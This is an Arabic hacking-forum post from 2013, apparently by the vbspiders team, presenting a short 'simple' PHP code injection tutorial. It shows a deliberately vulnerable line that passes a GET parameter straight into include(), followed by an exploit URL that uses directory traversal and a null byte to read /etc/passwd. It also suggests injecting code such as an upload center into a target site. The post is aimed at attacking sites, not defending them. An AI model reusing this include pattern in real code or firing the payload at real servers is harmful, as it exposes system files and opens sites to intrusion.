عرض مشاركة واحدة
قديم 11-27-2013, 11:51 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
bleu moon
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

.... PHP Code Injection Attack بسيط ..


السلام عليكم ورحمة الله تعالى وبركاته
تغرة حقن اكواد php صعب تلقاها، بس المهم رح نحاول نشرحها ..

الفكره انها تمكن المخترق من حقن اكواد php داخل الموقع المستهدف، يعني يمكن ان نقوم بحقن كود مركز تحميل او ما الى ذلك ... المهم

حقن دالة include() :

كود PHP:
<?php include($_GET["$include"]) ?>
الاستغلال :

كود PHP:
www.site.com/load.php?include=../../../etc/passwd%00 
والسلام عليكم.

@vbspiders team




PHP Code Injection Attack fsd' >>


التعديل الأخير تم بواسطة bleu moon ; 11-28-2013 الساعة 12:09 AM.

   

رد مع اقتباس